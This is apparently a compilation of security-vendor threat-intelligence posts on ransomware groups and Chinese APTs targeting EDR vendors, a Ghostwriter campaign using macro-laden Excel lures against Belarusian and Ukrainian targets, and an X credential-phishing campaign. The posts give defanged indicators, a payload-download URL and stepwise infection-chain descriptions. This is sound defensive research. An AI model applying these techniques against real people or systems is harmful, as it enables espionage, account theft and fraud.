This isn’t a new tactic. Various high-profile criminal groups have long specialized in social engineering campaigns to gain access to core security tools and infrastructure—ranging from EDR platforms (including SentinelOne and Microsoft Defender) to IAM and VPN providers such as Okta. Their goal: expand footholds, disable defenses, and obstruct detection long enough to profit.
Recent leaks related to Black Basta further underscore this trend. The group’s operators were observed testing across multiple endpoint security platforms—including SentinelOne, CrowdStrike, Carbon Black, and Palo Alto Networks—before launching attacks, suggesting a systematic effort to evaluate and evade security tools prior to deployment.
Black Basta leak excerpts
Economy/Ecosystem
There is an increasingly mature and active underground economy built around the buying, selling, and renting of access to enterprise security tools. For the right price, aspiring threat actors continually attempt to obtain time-bound or persistent access to our EDR platform and administrative consoles. Well-known cybercrime forums are filled with vendors openly advertising such access—and just as many buyers actively seeking it. This includes long-established forums like XSS[.]is, Exploit[.]in and RAMP.
That said, more of this activity has been moving to confidential messaging platforms as well (Telegram, Discord, Signal). For example, Telegram bots are used to automate trading this access, and Signal is often used by threat actors to discuss nuance, targeting and initial access operations.
This supply-and-demand dynamic is not only robust but also accelerating. Entire service offerings have emerged around this ecosystem, including “EDR Testing-as-a-Service,” where actors can discreetly evaluate malware against various endpoint protection platforms.
Proposed Private EDR testing service
While these testing services may not grant direct access to full-featured EDR consoles or agents, they do provide attackers with semi-private environments to fine-tune malicious payloads without the threat of exposure—dramatically improving the odds of success in real-world attacks.
Prospective buyer for EDR installs
Access isn’t always bought, however. Threat actors frequently harvest legitimate credentials from infostealer logs—a common and low-cost method of acquiring privileged access to enterprise environments. In cases where existing customers reuse credentials, this can translate into a threat actor also gaining access to security tools. In more targeted operations, actors have also turned to bribery, offering significant sums to employees willing to sell out their account access.
These insider threats are not hypothetical. For instance, some groups have been observed offering upwards of $20,000 to employees at targeted companies in exchange for insider assistance—an approach openly discussed in the same dark web forums where compromised credentials and access are routinely traded.
On the defensive side, this requires constant monitoring and maintenance. Situational awareness has to be prioritized in order to maintain platform integrity and protect our legitimate customers. Our research teams are constantly monitoring for this style of abuse and access ‘leakage’, focusing on anomalous console access and site-token usage, and taking necessary actions to revoke these access vectors. This prohibits threat actors from fully interacting with the wider platform, and essentially orphans leaked agent installs, limiting the use of the agent in the hands of the threat actor.
Nitrogen — Threat Operators ‘Leveling Up’
Some ransomware operations are now bypassing the underground market altogether—opting instead for more tailored, concentrated-effort impersonation campaigns to gain access to security tools. This approach is epitomized by the Nitrogen ransomware group.
Nitrogen is believed to be operated by a well-funded Russian national with ties to earlier groups like Maze and Snatch. Rather than purchasing illicit access, Nitrogen impersonates real companies—spinning up lookalike domains, spoofed email addresses, and cloned infrastructure to convincingly pose as legitimate businesses. Nitrogen then purchases official licenses for EDR and other security products under these false pretenses.
This kind of social engineering is executed with precision. Nitrogen typically targets small, lightly vetted resellers—keeping interactions minimal and relying on resellers’ inconsistent KYC (Know Your Customer) practices to slip through the cracks.
These impersonation tactics introduce a new layer of complexity for defenders. If a threat actor successfully acquires legitimate licenses from a real vendor, they can weaponize the product to test, evade, and potentially disable protections—without ever having to engage with criminal markets.
This highlights a growing challenge for the security industry: reseller diligence and KYC enforcement are clearly part of the threat surface. When those controls are weak or absent, adversaries like Nitrogen gain powerful new ways to elevate their campaigns—often at a lower cost and lower risk than the black market.
Lessons Learned and Internal Collaboration
One of the most impactful lessons from tracking adversaries targeting our platform has been the value of deep, early collaboration across internal teams — particularly those not traditionally pulled into threat response efforts. For example, by proactively engaging with our reseller operations and customer success teams, we can surface valuable signals on questionable license requests, reseller behavior anomalies, and business inconsistencies that could have otherwise gone unnoticed.
By creating shared playbooks, embedding lightweight threat context, and establishing clear escalation paths, reactive processes turn into proactive signal sources. Now, suspicious licensing activity—especially when paired with evasive behaviors or mismatched domain metadata—can surface much earlier in the workflow.
To scale this effort, we increasingly lean into automation. By codifying threat patterns—such as domain registration heuristics, behavioral metadata mismatches, and reseller inconsistencies—organizations can automate enrichment and risk-scoring for incoming licensing requests. This can then be used to dynamically filter, flag, and in some cases, auto-block high-risk activity before it reaches onboarding.
The growing trend of adversaries exploiting sales processes—whether through impersonation, social engineering, or brute-force credential use—means security vendors must treat every access vector, including commercial and operational pipelines, as part of the attack surface. Making cross-functional threat awareness standard operating procedure and integrating detection logic at the edge of business systems is essential.
We’re continuing to improve this work in quiet ways. And while we won’t share every detection logic here (for obvious reasons), we encourage others in the industry to pursue similar internal partnerships. Sales and support teams may already be seeing signs of abuse—security teams just need to give them the lens to recognize it.
Chinese State-Sponsored Adversaries
One notable set of activity, occurring over the previous months, involved reconnaissance attempts against SentinelOne’s infrastructure and specific high value organizations we defend. We first became aware of this threat cluster during a 2024 intrusion conducted against an organization previously providing hardware logistics services for SentinelOne employees. We refer to this cluster of activity as PurpleHaze, with technical overlaps to multiple publicly reported Chinese APTs.
The PurpleHaze Activity Cluster
Over the course of months, SentinelLABS observed the threat actor conduct many intrusions, including into a South Asian government supporting entity, providing IT solutions and infrastructure across multiple sectors. This activity involved extensive infrastructure, some of which we associate with an operational relay box (ORB) network, and a Windows backdoor that we track as GoReShell. The backdoor is implemented in the Go programming language and uses functionalities from the open-source reverse_ssh tool to establish reverse SSH connections to attacker-controlled endpoints.
SentinelLABS collectively tracks these activities under the PurpleHaze moniker. We assess with high confidence that PurpleHaze is a China-nexus actor, loosely linking it to APT15 (also known as Nylon Typhoon, or other various outdated aliases). This adversary is known for its global targeting of critical infrastructure sectors, such as telecommunications, information technology, and government organizations – victimology that aligns with our multiple encounters with PurpleHaze.
We track the ORB network infrastructure observed in the attack against the South Asian government organization as being operated from China and actively used by several suspected Chinese cyberespionage actors, including APT15. The use of ORB networks is a growing trend among these threat groups, since they can be rapidly expanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their attribution challenging. Additionally, GoReShell malware and its variations, including the deployment mechanism on compromised machines and obfuscation techniques have been exclusively observed in intrusions that we attribute with high confidence to China-nexus actors.
ShadowPad Intrusions
In June 2024, approximately four months prior to PurpleHaze targeting SentinelOne, SentinelLABS observed threat actor activity targeting the same South Asian government entity that was also targeted in October 2024. Among the retrieved artifacts, we identified samples of ShadowPad, a modular backdoor platform used by multiple suspected China-nexus threat actors to conduct cyberespionage. Recent ShadowPad activity has also included the deployment of ransomware, though the motive remains unclear — whether for financial gain or as a means of distraction, misattribution, or removal of evidence.
The ShadowPad samples we retrieved were obfuscated using ScatterBrain, an evolution of the ScatterBee obfuscation mechanism. Our industry partner, Google Threat Intelligence Group (GTIG), have also observed the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attribute them to clusters associated with the suspected Chinese APT actor, APT41.
GTIG APT41 Use of ScatterBrain
Investigations continue in determining the specific actor overlap between June 2024 ShadowPad intrusions and the later PurpleHaze activity. We do not rule out the involvement of the same threat cluster, particularly given the extensive sharing of malware, infrastructure, and operational practices among Chinese threat groups, as well as the possibility of access transfer between different actors.
Based on private telemetry, we identified a large collection of victim organizations compromised using ScatterBrain-obfuscated ShadowPad. Between July 2024 and March 2025, this malware was used in intrusions at over 70 organizations across various regions globally, spanning sectors such as manufacturing, government, finance, telecommunications, and research. We assess that the threat actor primarily gained initial foothold in the majority of these organizations by exploiting an n-day vulnerability in CheckPoint gateway devices, which aligns with previous research on ShadowPad intrusions involving the deployment of ransomware.
Among the victims, we identified the previously mentioned IT services and logistics organization that was at the time responsible for managing hardware logistics for SentinelOne employees. Victim organizations were promptly informed of intrusion specifics, which were swiftly investigated. At this point, it remains unclear whether the perpetrators’ focus was solely on the compromised organization or if they intended to extend their reach to client organizations as well.
A detailed investigation into SentinelOne’s infrastructure, software, and hardware assets found no evidence of secondary compromise. Nevertheless, this case underscores the fragility of the larger supplier ecosystem that organizations depend upon and the persistent threat posed by suspected Chinese threat actors, who continuously seek to establish strategic footholds to potentially compromise downstream entities.
SentinelLABS will share a detailed public release on this topic in due course, providing further technical information on these activities, including observed TTPs, malware, and infrastructure.
Lessons Learned While Hardening Our Operational Ecosystem
Our analysis of the PurpleHaze cluster, and more specifically the potential indirect risk introduced via compromised third-party service providers, has reinforced several key insights around operational security and supply chain monitoring. Even when our own infrastructure remained untouched, the targeting of an external service provider previously associated with business logistics surfaced important considerations.
One immediate reminder is the necessity of maintaining real-time awareness not only over internal assets but also over adjacent service providers—particularly those with past or current access to sensitive employee devices or logistical information. When incidents occur near your supply chain, don’t wait for confirmation of compromise. Proactively trigger internal reviews of asset inventories, procurement workflows, OS images and onboarding deployment scripts, and segmentation policies to quickly identify any exposure pathways and reduce downstream risk.
This leads to several defense recommendations:
Distribute Threat Intelligence Across Operational Stakeholders
Organizations should proactively share campaign-level threat intelligence with business units beyond the traditional security org—particularly those managing vendor relationships, logistics, and physical operations. Doing so enables faster detection of overlap with compromised third parties and supports early reassessment of exposure through external partners.
Integrate Threat Context Into Asset Attribution Workflows
Infrastructure and IT teams should collaborate with threat intelligence functions to embed threat-aware metadata into asset inventories. This enables more responsive scoping during incident response and enhances the ability to trace supply chain touchpoints that may be at risk.
Expand Supply Chain Threat Modeling
Organizations should refine their threat modeling processes to explicitly account for upstream supply chain threats, especially those posed by nation-state actors with a history of leveraging contractors, vendors, or logistics partners as indirect access vectors. Tailoring models to include adversary-specific tradecraft enables earlier identification of unconventional intrusion pathways.
While attribution continues to evolve and victim impact remains diverse, one thing is clear: well-resourced threat actors are increasingly leaning on indirect routes into enterprise environments. Investigations like this help us sharpen our defenses—not just around traditional digital perimeters but around the full operational footprint of our organization.
The Strategic Value of Cyber Threat Intelligence
In today’s threat landscape, threat intelligence has evolved from a niche function into an essential pillar of enterprise defense—particularly for private sector organizations operating in the security space. As threat actors increasingly target security vendors for insider access, abuse of legitimate channels, and supply chain infiltration, the role of CTI in anticipating and disrupting these tactics has become more critical than ever.
One of the most tangible examples of this value is in internal talent acquisition and insider threat defense. Intelligence has become a frontline asset in identifying attempts by North Korean IT workers and other state-backed operatives to embed themselves in organizations under false pretenses. By flagging suspicious applicant patterns, cross-referencing alias histories, and tracking known tradecraft, CTI teams help hiring managers and HR avoid potential insider incidents before they start.
Our CTI capabilities must also directly support sales and channel operations. As criminal groups increasingly impersonate legitimate businesses to acquire security products through trusted resellers, intelligence plays a key role in verifying customer legitimacy and identifying anomalous purchase behaviors. By integrating intelligence insights into pre-sale vetting workflows, a crucial layer of protection is helping to ensure adversaries cannot simply “buy” their way into our technology stack.
Internally, threat intelligence informs and enhances how we defend our own technology and supply chain against highly targeted APT activity. From understanding how adversaries reverse-engineer our software to uncovering which parts of our technology stack they seek to compromise, CTI enables proactive hardening, smarter telemetry prioritization, and meaningful collaboration with product and engineering teams. In essence, intelligence acts as an early-warning system and a strategic guide—ensuring our defenses stay one step ahead of evolving threats.
Across every function—whether it’s HR, Sales, Engineering, or Security—cyber threat intelligence is no longer a backroom function. It’s embedded in the fabric of how we defend, operate, and grow as a business.
SentinelLABS has observed a campaign targeting opposition activists in Belarus as well as Ukrainian military and government organizations.
The campaign has been in preparation since July-August 2024 and entered the active phase in November-December 2024.
Recent malware samples and command-and-control (C2) infrastructure activity indicate that the operation remains active in recent days.
SentinelLABS assesses that this cluster of threat activity is an extension of the long-running Ghostwriter campaign identified in previous public reporting.
Ghostwriter | Background
Ghostwriter is a long-running campaign likely active since 2016 and subsequently described in various public reports throughout 2020 to 2024. The actor behind Ghostwriter campaigns is closely linked with Belarusian government espionage efforts, while most commonly reported under the APT names UNC1151 (Mandiant) or UAC-0057 (CERT-UA). Some public reports may use the term “Ghostwriter APT” interchangeably to refer to both the threat actor and its associated campaigns.
Previous research on the evolution of Ghostwriter noted how it operated successfully across a range of platforms, blending information manipulation with hacking to target a number of European countries. Reporting throughout 2022 to 2024 described activity in which malicious Excel documents were used to deliver PicassoLoader and Cobalt Strike payloads. Observed document lures were themed around issues pertaining to the Ukraine military and the likely targeting of the Ministry of Defense.
SentinelLABS has observed new activity with multiple weaponized Excel documents containing lures pertaining to the interests of the Ukraine government, the Ukraine military and domestic Belarusian opposition. While some of the TTPs we have observed overlap with previous reporting, others are new, including adaptations of previously observed payloads such as PicassoLoader.
Weaponized XLS 1 | “Political Prisoners in Minsk Courts”
SentinelLABS analyzed an attack that started with a Google Drive shared document landing in the target’s inbox. The email originated from an account using the name “Vladimir Nikiforech” (vladimir.nikiforeach@gmail[.]com). The email link pointed to a downloadable RAR archive, which according to the internal timestamps was created on 2025-01-14 00:47:54, containing a malicious Excel workbook (ebb30fd99c2e6cbae392c337df5876759e53730d) with the file name политзаключенные(по судам минска).xls (“Political prisoners (across courts of Minsk).xls”).
The title of the lure indicates an interesting shift in Ghostwriter targeting. Although attribution for the 2021 Ghostwriter campaign pointed to the Belarus state, this is the first time we have seen lures directly aimed at Belarus government opposition. The timing of the attack could have been motivated by the presidential election that took place shortly after on Jan 26, 2025.
The XLS document contains an obfuscated VBA macro which is activated when the document is opened and the user allows Office macros to run.
Obfuscated macro inside the XLS spreadsheet
On execution, the macro writes a file to %Temp%\Realtek(r)Audio.dll.
The DLL file is loaded with the following command line invocation:
This starts the standard Windows process regsvr32.exe, which calls the DllUnregisterServer function implemented inside the DLL; the function then loads and executes the .NET assembly described next.
Analysis of Dwnldr.dll shows that it is a DLL file with a .NET assembly embedded inside. The file is protected with ConfuserEx – a publicly available tool that helps to obfuscate .NET programs and observed in previous Ghostwriter campaigns.
The DLL file hosts a payload that appears to be a simplified variant of PicassoDownloader, a malware family also linked to Ghostwriter activity. The internal filename (Dwnldr.dll) was previously used by the Ghostwriter threat actor; however, this variant bears only high-level similarities to previous versions, with significant changes to the underlying code, possibly to make it a cheaper and more expendable tool.
As a part of application protection provided by the obfuscator, the Downloader creates a copy of itself in memory, and then modifies it. It does so by decrypting additional code of the assembly. It also uses a clever evasion technique, altering its own PE header in memory and breaking internal links to the .NET assembly. This makes it impossible for security products to parse it as a .NET module.
During code execution, after the protection layer passes control to core functionality, the Downloader writes a decoy Excel workbook file to %AppData%\Roaming\Microsoft\temp.xlsx and downloads additional file(s) from the Web.
The temp.xlsx decoy file (18151b3801bd716b5a33cfc85dbdc4ba84a00314) is immediately opened in Excel in an attempt to make the victim believe that it contains the original content of the политзаключенные (по судам минска).xls file.
Decoy document containing lists of people with criminal charges, prosecutors’ and judges’ names
The spreadsheet contains the names of people with criminal charges along with the names of prosecutors and judges: content that invites the reader to believe it could be leaked from a government source. However, the information was already in the public domain and can be found on the website of a proscribed Belarusian human rights organization, Spring96.
Once the decoy Excel file is opened, the Downloader attempts to fetch the next stage from the following URL:
We note that the .shop top level domain was also reported in other Ghostwriter activity seen in 2024.
When the malware issues the HTTP request, it uses a hardcoded User-Agent string:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/555.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
The fetched file (8d2bb96e69df059f279d97989690ce3e556a8318) is a benign JPEG file, originating from publicly available photo stock, with no extra payload or any hidden cave where code could be embedded. We confirmed that an identical file can be found online, located on a web site that is nearly identical to the one used by attackers. It would seem the attackers not only reused the JPG file contents from a legitimate website but also copied its original URL, changing only the top level domain:
This Registry entry makes rundll32.exe load the DLL and execute its exported function with ordinal 1 whenever a user logs on.
Overview of the malware stages for Weaponized XLS 1
During our analysis we only observed the benign JPG file being downloaded. However, based on the code analysis, we believe that the real targets receive an actual DLL. We assume that such a targeted payload delivery process is carefully controlled by the attackers and that they deliver the payload only after confirming the requesting client’s profile (browser user agent, IP address of the client, and matching time of the operation window). Research in a previous campaign found that a Cobalt Strike payload was delivered to targets only if the host IP was located in Ukraine.
Given the timing and targeting of the attack, we hypothesized that it may not have been an isolated incident. Further research led us to discover other samples closely resembling Weaponized XLS 1, suggesting that multiple attacks using the same techniques had been planned or executed. The samples used in these suspected attacks are described below.
A file bearing the Ukrainian name Zrazok.xls (“Sample.xls”) is an XLS file (301ffdf0c7b67e01fd2119c321e7ae09b7835afc) with an obfuscated VBA macro embedded. However, the script code and obfuscation technique are different from the case we discussed earlier.
For this script, the attackers used a popular obfuscator tool called Macropack, an open-source but seemingly abandoned project originally developed for red-teaming and penetration testing exercises.
Macropack-obfuscated VBA macro found inside the spreadsheet
As in the previous case, once the macro code is executed, the .NET ConfuserEx-obfuscated Downloader DLL (written to %AppData%\Roaming\Microsoft\bruhdll32.dll) is loaded with rundll32.exe and respective commandline arguments to run an exported function. After this, the new module drops a decoy XLS file and opens it with Excel.
The decoy document prepared for a Ukrainian reader (an action plan for anti-corruption initiative in government organisations in Ukraine)
This module attempts to download the next stage from the following URL (unavailable at the time of writing):
Again, the file name and the path on the malicious server were nearly identical to the legitimate one, with the actor changing only the top level domain from .com to .shop.
In this case, the downloaded file is expected to be an archive in a GZIP format. Once downloaded, the malware decompresses it and saves it to the following location:
This suggests that the CertificateCenter.dll file is not a binary as the file extension would suggest but rather contains program source code. The command, if successful, produces an executable file in the following location:
and likely contains the next stage of the infection chain.
Overview of the malware stages for Weaponized XLS 2
Weaponized XLS 3 | “Supplies for Ukraine Armed Forces”
A file bearing the Ukrainian name Донесення 5 реч - зразок.xls (“Report 5 items – sample.xls”) is an XLS file (9d110879d101bcaec7accc3001295a53dc33371f) hosting another VBA payload obfuscated with Macropack.
As in the previous cases, once the macro code is executed, the .NET ConfuserEx-obfuscated Downloader DLL (written to %AppData%\Roaming\Microsoft\bruhdll32.dll) is loaded with rundll32.exe and respective commandline arguments to run an exported function. After this, the new module drops a decoy XLS file on disk and opens it with Excel.
The decoy document prepared for a Ukrainian reader (a report template for the Ukrainian armed forces supplies)
Again, the malware uses the same payload retrieval technique and downloads a JPG file from yet another .shop domain:
https://cookingwithbooks[.]shop/images/qwerty.jpg
The URL is unavailable at the time of writing, but data from VirusTotal indicates that the downloaded file is identical to the black hole image described above in the Weaponized XLS 2 section. The malware logic is also identical with Weaponized XLS 2.
Weaponized XLS 4 & 5 | Variations on a Theme
In addition to the previous findings, we discovered further related XLS files that were similarly weaponized. The files Донесення 5 реч фонд зборів- зразок.xls (“Report 5 items collection fund- sample.xls”; 2c06c01f9261fe80b627695a0ed746aa8f1f3744) and Додаток 8 реч новий.xls (“Addition 8 items new – sample.xls”; 853da593d2a489c2bd72a284a362d7c68c3a4d4c) were first uploaded from Ukraine in Feb 2025.
Both files contain a Macropack-obfuscated VBA macro; however, they differ in structure. Functionally, both drop a DLL to the previously noted path %AppData%\Roaming\Microsoft\bruhdll32.dll.
Again, the DLL is loaded with rundll32.exe and respective command line arguments to execute an exported function. Next, the victim sees a decoy workbook open in Excel.
The decoy documents prepared for a Ukrainian reader (a report template for the Ukrainian armed forces supplies)
The decoys are similar and the obfuscation technique, code structure, and the embedded URL are common to both:
The User-Agent string in the HTTP request, however, is different, with the operating system and architectures specified as “Windows NT 10.0; Win64; x64”.
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.71
These variants of the malware also contain another embedded .NET DLL, internally referred to as LibCMD from the original filename LibCMD.dll (4ae6b8adc980ba8a212b838f3ca6a9718d9a3757). This is a small file, whose purpose is simply to start cmd.exe and connect to stdin/stdout.
The file contains a tampered PE link timestamp. It is never saved to disk; instead, it is loaded dynamically in memory as a .NET assembly and executed.
Overview of the malware stages for Weaponized XLS 4 & 5
Attribution
Analysis of techniques used by threat actors can often be helpful in establishing the origin of the attack and the malware it uses. In this case, the obfuscation techniques are quite specific across all the samples we analyzed, allowing us to establish a medium confidence link between them and a malware cluster known as PicassoLoader, a downloader toolkit.
PicassoLoader has been used in cyber attacks targeting government, military, and civilian entities in Ukraine and Poland and is exclusively associated with the Ghostwriter threat actor (aka UNC1151, UAC-0057, Blue Dev 4, Moonscape, TA445).
Throughout 2024, Ghostwriter has repeatedly used a combination of Excel workbooks containing Macropack-obfuscated VBA macros and dropped embedded .NET downloaders obfuscated with ConfuserEx. In our case, the Downloader malware appears to be a simplified implementation of the PicassoLoader.
Conclusion
The Ghostwriter threat actor has been consistently active in the past years and continues its attempts to compromise targets aligned with the interests of Belarus and its closest ally, Russia. It has mounted multiple attacks reported by CERT UA and other security researchers throughout 2024.
While Belarus doesn’t actively participate in military campaigns in the war in Ukraine, cyber threat actors associated with it appear to have no reservation about conducting cyberespionage operations against Ukrainian targets.
The campaign described in this publication also serves as confirmation that Ghostwriter is closely tied with the interests of the Belarusian government waging an aggressive pursuit of its opposition and organizations associated with it.
We would like to express our thanks to partners in the region, including RESIDENT.NGO and others who remain unnamed, for their invaluable collaboration.
Organizations that believe they may have been targeted by threat actors involved in this campaign are invited to reach out to the SentinelLABS team via ThreatTips@sentinelone.com.
An active phishing campaign is targeting high-profile X accounts in an attempt to hijack and exploit them for fraudulent activity.
This campaign has been observed targeting a variety of individual and organization accounts such as U.S. political figures, leading international journalists, an X employee, large technology organizations, cryptocurrency organizations, and owners of valuable, short usernames.
SentinelLABS’ analysis links this activity to a similar operation from last year that successfully compromised multiple accounts to spread scam content with financial objectives. While the activity detailed here is centered around X/Twitter accounts, this actor is not limited to a single social platform, and can be observed directing attention to other popular services as well, while seemingly pursuing the same financial objectives.
If you’ve encountered similar suspicious activity, SentinelLABS would love to hear from you — please reach out to the team at ThreatTips@sentinelone.com.
Account Compromise Process
Thanks to tips from targets and collaboration with industry partners, SentinelLABS has observed a variety of phishing lures tied to this campaign over the past few weeks. One example is the classic account login notice. The links in the email received by the target are not legitimate and lead to credential phishing sites. Other observed lures use copyright violation themes. However, SentinelLABS notes that directly phishing users may not be the only access method employed by this attacker.
An X ‘new login’-themed phishing email
In recent cases, we observed the actor abusing Google’s “AMP Cache” domain cdn.ampproject[.]org to evade email detections and redirect the user to a phishing domain:
This ultimately leads the targets to an actor-made phishing website seeking X account credentials:
X credential phishing page
In the copyright infringement lure scenario, the user will first visit an Action Needed page before being prompted to enter credentials:
X fake copyright infringement page
Once an account is taken over, the attacker swiftly locks out the legitimate owner and begins posting fraudulent cryptocurrency opportunities or links to external sites designed to lure additional targets, often with a crypto theft-related theme. Ultimately, compromising high-profile accounts enables the attacker to reach a broader audience of potential secondary victims, maximizing their financial gains.
Widespread Activity
In recent activity associated with this campaign, the domain securelogins-x[.]com has been used to deliver emails and x-recoverysupport[.]com to host phishing pages. Our observations indicate a level of informality and flexibility of infrastructure use – meaning any of these domains can be considered email delivery or phishing page hosting.
An overall collection of recent activity can be observed hosted on 84.38.130[.]20, an IP associated with a Belize-based VPS service called Dataclub. The domains themselves have been predominantly registered through Turkish hosting provider Turkticaret.
Inspecting the DNS history of 84.38.130[.]20 leads to a variety of interestingly related domains. As shown below, the cluster of activity began in mid-2024 and continues today. While this is only one phishing page hosting IP, it provides a good perspective of the length of this activity and its ability to avoid much attention for over a year.
Validin Infrastructure Analysis Timeline
Our observations suggest that the attacker is highly adaptable, continuously exploring new techniques while maintaining a clear financial motive. The targeting appears constrained, yet opportunistic. Notably, past public reports have attributed related activity to Turkish-speaking actors based on language phishing page source comment language. At this time, we do not attribute this campaign to a specific country or any widely-tracked threat actor.
Some of the malicious sites and content hosted across 84.38.130[.]20 are built using the FASTPANEL DIRECT service.
FASTPANEL landing page on buy-tanai[.]com
FASTPANEL is a website hosting and building service that specializes in rapid building and management of websites. While FASTPANEL is not a malicious service, it is frequently abused by bad actors due to the ease of use, rapid scalability, and relatively low cost. FASTPANEL is routinely utilized by drainer gains and phishing campaigns, and is also included in associated guides and tutorials distributed throughout cybercrime communication channels.
Example discussion of FASTPANEL (RU crime forum)
Of the sites hosted on 84.38.130[.]20, the buy-tanai[.]com and emotionai[.]live sites still present the FASTPANEL landing pages as of this writing.
Publicly Linkable Activity
Emerging Account Intrusions
While we have not yet established a high-confidence link, a recent compromise of a Tor Project account closely mirrors our observations. On January 30, 2025, the official X account for the Tor Project was breached. While it is possible that the same threat actor is responsible, we lack sufficient evidence to confirm the connection as of this writing.
X post from The Tor Project account on January 30, 2025 advising users of a potential compromiseTor Project account compromise notice
The Decentralized Autonomous Wireless Network (DAWN) was another victim of this type of attack. The threat actor leveraged the compromised DAWN-related social media accounts to lure victims into entering credentials into phishing pages targeting X and Telegram credentials.
DAWN X Posts
The compromise of DAWN’s X accounts goes back to mid-January 2025.
January 14, 2025 – DAWN rewards compromise post
Crypto-Themed Project Placeholders
In some cases, we’ve observed cryptocurrency themed projects seemingly acting as placeholders for future use, or direct pump-and-dump schemes. In one example, buy-tanai[.]com was pitched as such: “$TANA AI. Dawn’s AI project, Tana is the first AI-powered LP and trading agent, now live on the Solana blockchain.”
Tana AI (TANA) on Pump[.]fun
The domainbuy-tanai[.]com currently displays default FASTPANEL landing pages, suggesting it — along with other similar domains — is being staged for future attacks. Since FASTPANEL-managed sites can be rapidly updated, these domains serve as adaptable templates for phishing campaigns.
Notably, TANA AI (TANA) was launched by Dawn in mid-January to promote AI-driven trading and liquidity provision in the cryptocurrency market. Despite losing most of its initial value within days, the currency remains actively traded across multiple decentralized exchanges.
Given the crypto-related nature of these domains, it is likely that threat actors are using them as flexible phishing infrastructure. By keeping them as blank templates, they can quickly modify hosted content to align with ongoing campaigns as needed.
Crimeware Relations
Several other domains share overlaps in both use and unique infrastructure details, yet they represent a fork from the previously described high-profile social media profile attacks, including:
dataoptimix[.]com
gamecodestudios[.]com
shortwayscooter[.]com
The domain shortwayscooter[.]comhosts fake captchas that deliver the DanaBot banking trojan. DataOptimix is branded as a generative AI solution, though there are few details about what the service does.
DataOptimix
Historical Connections
In mid-2024, a campaign used related infrastructure in similar phishing messages, including those which compromised the Linus Tech Tips Twitter account along with several other high profile users. At the time, @LinusTech had roughly 1.8million followers, which may represent the highest profile account successfully hijacked and linked to this actor.
Linus Tech Tips Twitter compromise
Conclusion
The cryptocurrency landscape offers financially-motivated threat actors multiple opportunities for profit and fraud. While marketing for coins and tokens has long been irreverent and meme-driven, recent developments have further blurred the line between legitimate projects and scams.
A striking example occurred in January 2025, when the X account of the late crypto-enthusiast and antivirus founder John McAfee was reactivated to promote a new coin, $AIntivirus. The marketing style and brand voice of this purportedly legitimate token closely resemble tactics used in known scam campaigns, highlighting how easily crypto enthusiasts can be misled in an already murky ecosystem.
To safeguard your X account, we strongly recommend using a unique password, enabling two-factor authentication (2FA), and avoiding credential sharing with third-party services. Be especially cautious of messages containing links to account alerts or security notices. Always verify URLs before clicking, and if a password reset is needed, initiate it directly through the official website or app rather than relying on unsolicited links.
If you’ve encountered similar suspicious activity, we’d love to hear from you. Contact SentinelLABS at ThreatTips@sentinelone.com.
Entrar
![Initial view of a page from zoomconference[.]app](https://www.sentinelone.com/wp-content/uploads/2025/10/PhantomCaptcha_4.jpg)
![Domain timeline, focused on October and later, on 193.233.23[.]81](https://www.sentinelone.com/wp-content/uploads/2025/10/PhantomCaptcha_1.jpg)
![zoomconference[.]click HTTPS response data matching princess-mens[.]click](https://www.sentinelone.com/wp-content/uploads/2025/10/PhantomCaptcha_6.jpg)
![DNS history for scientcontopped[.]com prior to expiration (2024)](https://www.sentinelone.com/wp-content/uploads/2025/05/FreeDrain_19.jpg)
